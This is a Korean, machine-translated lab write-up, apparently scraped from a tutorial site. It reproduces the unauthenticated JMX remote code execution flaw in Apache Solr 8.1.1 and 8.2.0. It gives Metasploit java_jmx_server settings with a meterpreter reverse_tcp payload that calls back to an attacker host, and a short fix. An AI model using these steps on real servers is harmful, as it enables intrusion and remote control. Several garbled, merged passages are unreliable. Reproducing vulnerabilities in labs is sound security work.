Apache Solr JMX 서비스에서 RCE 취약점을 재현하는 방법

WBOY
풀어 주다: 2023-05-14 14:25:06
앞으로
1457명이 탐색했습니다.

0x00 소개

Solr는 웹 서비스와 유사한 API 인터페이스를 제공하는 독립된 기업용 검색 애플리케이션 서버입니다. 사용자는 http 요청을 통해 특정 형식의 XML 파일을 검색 엔진 서버에 제출하여 인덱스를 생성할 수 있으며, Http Get 작업을 통해 검색 요청을 하고 XML 형식으로 반환된 결과를 얻을 수도 있습니다.

이 취약점은 기본 구성 파일 solr.in.sh의 ENABLE_REMOTE_JMX_OPTS 구성 옵션의 보안 위험으로 인해 발생합니다.

ENABLE_REMOTE_JMX_OPTS="true" 옵션은 Apache Solr 버전 8.1.1 및 8.2.0의 내장 구성 파일 solr.in.sh에 있습니다.

해당 버전의 기본 solr.in.sh 파일을 사용하는 경우 JMX 모니터링이 활성화되고 RMI_PORT(기본값 = 18983),

에 노출되며 인증이 필요하지 않습니다. 방화벽에서 인바운드 트래픽을 위해 이 포트가 열려 있으면 Solr 노드에 대한 네트워크 액세스 권한이 있는 사람은 누구나 JMX에 액세스할 수 있으며

Solr 서버에서 실행될 악성 코드를 업로드할 수 있습니다. 이 취약점은 Windows 시스템 사용자에게는 영향을 미치지 않으며 일부 Linux 버전 사용자에게만 영향을 미칩니다.本0x01 Impact 버전 0apache Solr8.1.1 version Line time : 2019-05-28

APACHE SOLR8.2.0 version Line time : 2019-07-25

0x02 Vulnerability Harm

피해자가 이용되면 피해자는 이 기본 구성이 구성되면 JMX 서비스는 기본 포트 18983에서 열리고 기본적으로 인증이 활성화되지 않습니다. 이 포트에 액세스할 수 있는 모든 공격자는 이 취약점을 악용하여 영향을 받는 서비스에 대한 공격을 시작하고 임의 코드를 실행할 수 있습니다.

0x03 환경 구축

Java 환경과 kali 시스템, Solr 8.20

Solr 8.20 다운로드 주소: wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2 .0.zip

unzip solr-8.2.0.zip을 사용하여 압축을 푼다.

如何进行Apache Solr JMX服务RCE漏洞复现

압축이 완료된 후 bin 디렉터리로 전환하여 Solr

./solr start -force

如何进行Apache Solr JMX服务RCE漏洞复现

을 시작합니다.

시작 후 액세스 :http://192.168.10.176:8983/

如何进行Apache Solr JMX服务RCE漏洞复现

0x04 취약점 재발

如何进行Apache Solr JMX服务RCE漏洞复现 공격 머신: kali IP: 192.168.10.147

피해 머신: Ubuntu18.6의 docker IP: 192.168. 10 .184:8983 1. nmap을 사용하여 포트 18983이 열려 있는지 확인합니다.

2. 취약점을 재현하려면 Metasploit의 explore/multi/misc/java_jmx_server 모듈을 사용하세요.

Ø multi/misc/java_jmx_server

如何进行Apache Solr JMX服务RCE漏洞复现Ø set RHOST 192.168.10.184

Ø set RPORT 18983

페이로드 설정: java/meterpreter/reverse_tcp

Ø set 페이로드 java/meterpreter/reverse_tcp

如何进行Apache Solr JMX服务RCE漏洞复现Ø 설정 LHOST 192.16 8.10. 147 Ø 설정 LPORT 4444

3을 사용하여 실행되면 연결이 성공적으로 설정되어 있음을 알 수 있습니다. .sh 구성 파일을 false로 설정한 다음 Solr 서비스를 다시 시작합니다.

위 내용은 Apache Solr JMX 서비스에서 RCE 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:yisu.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿